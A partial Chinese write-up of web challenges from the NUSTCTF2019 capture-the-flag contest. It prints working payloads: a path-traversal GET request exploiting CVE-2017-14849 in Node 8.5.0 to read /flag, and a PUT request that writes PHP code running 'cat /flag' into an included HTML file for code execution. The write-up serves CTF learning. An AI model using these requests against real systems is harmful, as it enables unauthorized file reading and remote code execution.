NUSTCTF2019 Web题解(部分)

sendRedirect

挂代理检查HTTP重定向消息,发现header中nustctf字段,base58解码得到flag。

net-disk

利用node v8.5.0的CVE-2017-14849任意文件读取漏洞读取根目录下的flag文件,并获得net-disk Revenge的hint。

payload:

1
2
GET http://47.52.244.69:7000/static/../../../a/../../../../flag HTTP/1.1
Host: 47.52.244.69:7000

put your hands up

为suctf2018招新赛出的题,怕题量不够这里就拿过来改了前端,HTML源码添加了CVE提示。编辑页面index.php对用户创建的HTML文件进行了一次包含。index.php对输入的前端代码中的PHP代码进行了严格过滤。用PUT方法可以绕过index.php的过滤,直接对HTML文件进行更新。

先找到用户对应生成的HTML文件,用PUT方法写入PHP代码,再次访问index.php触发RCE。

payload:

1
2
3
4
5
6
PUT http://xxxx/pages/RQklSfSiIhWxxxxxxxxx.html HTTP/1.1
Content-Length: 20
Accept: */*
Host: xxxx

<? echo `cat /flag`;

×

纯属好玩

扫码支持
扫码打赏,你说多少就多少

打开支付宝扫一扫,即可进行扫码打赏哦

文章目录
  1. 1. sendRedirect
  2. 2. net-disk
  3. 3. put your hands up
,